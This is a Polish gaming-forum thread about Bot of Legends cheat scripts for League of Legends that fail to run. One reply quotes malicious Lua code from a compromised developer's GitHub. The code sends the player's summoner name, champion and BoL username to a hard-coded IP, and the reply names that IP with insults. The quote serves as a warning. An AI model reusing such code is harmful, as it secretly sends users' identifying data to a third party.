Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Dlaczego nie działają mi skrypty?

Rekomendowane odpowiedzi

Opublikowano

Te wbudowane w lola działają normalnie, ale te które ściągnę z forum nie działają.

Przy okazji mógłby ktoś mi dać folder bola z glory ryze bo nie potrafie tego zainstalować (tak wiem nie działają mi skrypty ale na przyszłość :p)

50 postów

100 postów

150 postów

200 postów

250 postów

Opublikowano

No i gówno, reakcja bola w grze : [string LoadVipScript sratatatata

50 postów

100 postów

150 postów

200 postów

250 postów

Opublikowano

Jeżeli zaktualizowały Ci się skrypty hondy musisz je pobrać od nowa w starej wersji.

Dlaczego? Wyjaśnienie masz tutaj : 

Konto na Githubie jednego z deweloperów, Hondy, zostało przejęte.

https://github.com/honda7/BoL

A w skryptach:

local version = 2.0

function OnLoad()
    GetAsyncWebResult("46.29.19.99", "/?n="..myHero.name.."&c="..myHero.charName.."&d="..GetUser(), function(d) print("done") end)
    PrintChat("<font color='#ff0000'>Hello, cheater. All your data was send to RITO ["..myHero.name..", "..myHero.charName..", "..GetUser().."]</font>")
end

Nazwa naszego przywoływacza, nazwa usera na BoL'u są wysyłane na nieznany adres IP. Nie używajcie tych skryptów, bądź wyłączcie autoupdater.

to na tyle.

MORDECZKI, JEDEN Z NASZYCH ZIOMKÓW SIĘ ROZPRUŁ. IP 46.29.19.99 POCHODZI Z POLSKI, DOKŁADNIEJ - OLSZTYN. CHUJ CI W DUPE LAMUSIE.

I oczywiście wyłącz autoupdate.

empty

Opublikowano

@up

zwykłe nabijanie postów, już to czytałem, offtop

@top

ten loadvipscript sratatata nie jest od skryptu, tylko od czegoś innego bo następny mecz zagrałem z bolem (zapomniałem wyłączayć) i dalej to było.

Skrypty na champy wbudowane w bola też mi nie działają.

50 postów

100 postów

150 postów

200 postów

250 postów

Opublikowano

Kolego. Jedne skrypty można wgrać przez bola tworząc nowy skrypt itd. A drugie trzeba walnąc w pliku i wgrać do innego folderu jeszcze. Nie wszystkie się wgrywa do jednego. Teraz ci nie powiem, bo na fonie jestem ale spróbuj wgrać so /scripts/common albo gdzies indziej niz masz te wszystkie inne.

Opublikowano

@2up

dalej to samo :C czo ten bol

50 postów

100 postów

150 postów

200 postów

250 postów

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...